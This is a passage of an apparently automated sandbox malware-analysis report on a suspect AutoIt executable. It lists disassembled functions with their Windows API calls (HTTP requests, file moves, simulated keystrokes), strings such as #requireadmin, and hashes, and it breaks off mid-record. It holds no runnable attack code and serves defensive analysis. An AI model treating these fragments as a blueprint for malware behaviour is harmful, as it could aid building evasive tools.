                                                                                                                                                                            • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0045F317
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                                                                            • IsMenu.USER32(?), ref: 0045F380
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                            • API String ID: 3311875123-3793063076
                                                                                                                                                                            • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                            • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                                                                            • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                                                            • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\LlbpXphTu9.exe), ref: 0043719E
                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                                                                            • _printf.LIBCMT ref: 004371EC
                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                                                                            • C:\Users\user\Desktop\LlbpXphTu9.exe, xrefs: 00437189
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_printf
                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\LlbpXphTu9.exe
                                                                                                                                                                            • API String ID: 220974073-1106449200
                                                                                                                                                                            • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                            • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                                                                            • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                                                            • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                            • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                                                                            • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                            • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LlbpXphTu9.exe,?,C:\Users\user\Desktop\LlbpXphTu9.exe,004A8E80,C:\Users\user\Desktop\LlbpXphTu9.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 978794511-0
                                                                                                                                                                            • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                            • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                                                            • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                            • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                            • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                            • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                                                                              • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                                                                              • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                            • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                                                            • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                                                                            • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                                                            • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                                                                            • String ID: AU3_FreeVar
                                                                                                                                                                            • API String ID: 2184576858-771828931
                                                                                                                                                                            • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                                                                            • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                                                                            • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                                                                            • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                                                                            APIs
                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                            • String ID: close all
                                                                                                                                                                            • API String ID: 4174999648-3243417748
                                                                                                                                                                            • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                                                                            • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                                                                            • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1291720006-3916222277
                                                                                                                                                                            • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                            • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                                                                            • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastselect
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 215497628-2761332787
                                                                                                                                                                            • Opcode ID: 0de0448ade90d459e176b7eabd0eb7793c39b194d41e4bdd7ff4fb8690f4e17f
                                                                                                                                                                            • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                                                                            • Opcode Fuzzy Hash: 0de0448ade90d459e176b7eabd0eb7793c39b194d41e4bdd7ff4fb8690f4e17f
                                                                                                                                                                            • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                                                            • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                                                            • API String ID: 1729044348-3708979750
                                                                                                                                                                            • Opcode ID: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                                                                            • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                                                                            • Opcode Fuzzy Hash: e5856c69d37335927e932bb259c431c810e65197c095b32473e915812f67d75c
                                                                                                                                                                            • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LlbpXphTu9.exe,?,C:\Users\user\Desktop\LlbpXphTu9.exe,004A8E80,C:\Users\user\Desktop\LlbpXphTu9.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                                                                            • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                                                                            • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                            • API String ID: 2326526234-1173974218
                                                                                                                                                                            • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                            • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                                                                            • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                                                                            • _wcslen.LIBCMT ref: 004366DD
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                                                                            • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                                                                              • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                            • String ID: \
                                                                                                                                                                            • API String ID: 321622961-2967466578
                                                                                                                                                                            • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                                                                            • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                            • API String ID: 1038674560-2734436370
                                                                                                                                                                            • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                                                                                                                            • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
